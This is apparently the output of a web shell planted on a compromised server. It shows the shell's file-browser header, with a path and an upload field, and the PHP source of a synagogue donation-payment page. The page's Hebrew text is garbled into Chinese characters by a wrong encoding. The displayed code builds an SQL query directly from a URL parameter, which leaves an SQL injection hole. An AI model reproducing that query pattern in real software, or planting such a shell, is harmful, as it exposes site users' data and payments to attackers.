?

webshll2019

Current Path : /home/webyoo/www/backup/allback/docteur-site/cv/sym/a/hanessiim/site/admin/
Upload File :
Current File : /home/webyoo/www/backup/allback/docteur-site/cv/sym/a/hanessiim/site/admin/payment_page.php

<?php
include_once "start.php";
$err = 0;
if(isset($_GET['id']) && strlen($_GET['id']) >= 17){
    $id = substr($_GET['id'], 8, strlen($_GET['id']) - 16);
    if($id == 26){
        $name = "转讜专诐 讗谞讜谞讬诪讬";
        $balance = 0;
    }else{
        $sqlusers = mysqli_query($link,"SELECT * FROM syna_users WHERE id = ".$id);
        $rowusers = mysqli_fetch_array($sqlusers, MYSQLI_ASSOC);
        $name = $rowusers['first_name'].' '.$rowusers['last_name'];
        $balance = $rowusers['balance'];
    }
}else{
    $err = 1;
}

if($err == 0){
?>
<!DOCTYPE html>
<html lang="he">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="ThemeBucket">
    <link rel="shortcut icon" href="images/favicon.png">

    <title>讚祝 转专讜诪讛 注讘讜专 讘讬转 讛讻谞住转 讛谞砖讬讗讬诐</title>

    <!--Core CSS -->
    <link href="bs3/css/bootstrap.min.css" rel="stylesheet">
    <link href="css/bootstrap-reset.css" rel="stylesheet">
    <link href="font-awesome/css/font-awesome.css" rel="stylesheet" />
    <link rel="stylesheet" href="js/data-tables/DT_bootstrap.css" />
    <link href="css/style.css" rel="stylesheet">
    <link href="css/style-responsive.css" rel="stylesheet" />

    <style>
        body {
            direction: rtl;
            text-align: center;
        }
        .bloc{
            width: 50%;
        }
        @media (max-width: 767px) {
            .bloc{
                width: 90%;
            }
        }
    </style>
</head>

<body>
<section id="container">
    <section class="wrapper">
        <div class="row" style="margin:0 auto; font-size: 16px; font-family: Arial, sans-serif;">
            <div class="bloc" style="text-align: center;margin: 0 auto;">
                <section class="panel">
                    <img src="images/hanesiim.com.png" style="margin:0 auto; width: 200px;" alt=""><br>
                    <img src="images/logo_pelecard.png" style="margin:0 auto; width: 100px;" alt="">
                    <header class="panel-heading">
                        <b>砖诇讜诐, 讘专讜讱 讛讘讗 诇讚祝 讛转专讜诪讜转 注讘讜专 讛讘讬转 讛讻谞住转 讛谞砖讬讗讬诐 <br><br>
                        讗谞讗 诪诇讗 讗转 讛驻专讟讬诐 砖诇讱 讜讘讞专 讗转 讛住讻讜诐 砖讘专爪讜谞讱 诇砖诇诐 讻讗谉 : <br><br></b>
                    </header>
                    <div class="panel-body">
                        <form method="post" action="payment_pelecard.php">
                            <input type="hidden" name="id_user" value="<?=$id?>">
                            <input type="text" id="fullname" name="fullname" placeholder="诪诇讗 砖诐 讜砖诐 诪砖驻讞讛 讻讗谉" class="form-control" value="" required><br><br>
                            <input type="email" id="email" name="email" placeholder="诪诇讗 讻转讜讘转 诪讬讬诇 讻讗谉" class="form-control" value="" required><br><br>
                            <input type="tel" id="tel" name="tel" style="text-align: end;" placeholder="诪诇讗 诪住驻专 讟诇驻讜谉 讻讗谉" class="form-control" value="" required><br><br>
                            <input type="text" id="amount" name="amount" placeholder="诪诇讗 住讻讜诐 讻讗谉" class="form-control" style="border:2px solid #333" value="<?php echo $balance > 0 ? $balance : '' ?>" required><br><br>
                            <input type="submit" value="砖诇诐 注讻砖讬讜!" class="btn btn-primary btn-block btn-lg">
                        </form>
                    </div>
                </section>
            </div>
        </div>
    </section>
</section>

<?php 
}else{
    echo "砖讙讬讗讛 讘拽讬砖讜专 讝讛. 讚祝 讛转专讜诪讛 讗讬谞讜 讝诪讬谉.";
}?>

</body>
</html>



web shell, Coded By 2019